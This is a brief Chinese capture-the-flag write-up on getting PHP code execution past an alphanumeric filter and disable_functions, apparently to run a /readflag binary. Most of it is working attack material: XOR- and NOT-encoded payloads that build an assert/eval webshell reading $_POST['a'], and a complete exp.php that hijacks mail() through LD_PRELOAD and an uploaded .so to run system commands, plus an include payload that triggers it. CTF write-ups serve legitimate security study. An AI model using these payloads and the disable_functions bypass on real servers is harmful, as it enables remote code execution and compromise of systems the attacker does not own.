代码执行,过滤了字母数字,用异或或取反都可以
code=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo
发现过滤了大部分命令执行的函数,下面考虑如何绕过,有两种方法
①蚁剑插件
首先构造一个木马
code=$_=~(%A0%B8%BA%AB);${$_}[__](${$_}[___]);&__=assert&___=eval($_POST[%27a%27]);
flag无法读取,读取/readflag发现是二进制文件
② LD_preload + mail劫持so来执行系统命令
bypass_disablefunc_x64.so文件地址
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
上传exp.php
<?php
// exp.php
$cmd = "/readflag";
$out_path = "/tmp/1.txt";
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = "/tmp/bypass_disablefunc_x64.so";
putenv("LD_PRELOAD=" . $so_path);
mail("", "", "", "");
echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";
unlink($out_path);
?>
code=$_=~(%A0%B8%BA%AB);${$_}[__](${$_}[___]);&__=assert&___=include%20%22/tmp/exp.php%22;
关于LD_preload + mail劫持so
https://www.freebuf.com/articles/web/192052.html
https://www.anquanke.com/post/id/175403#h2-0
https://imagin.vip/?p=508
https://www.cnblogs.com/yesec/p/12483631.html
https://blog.csdn.net/crisprx/article/details/104349608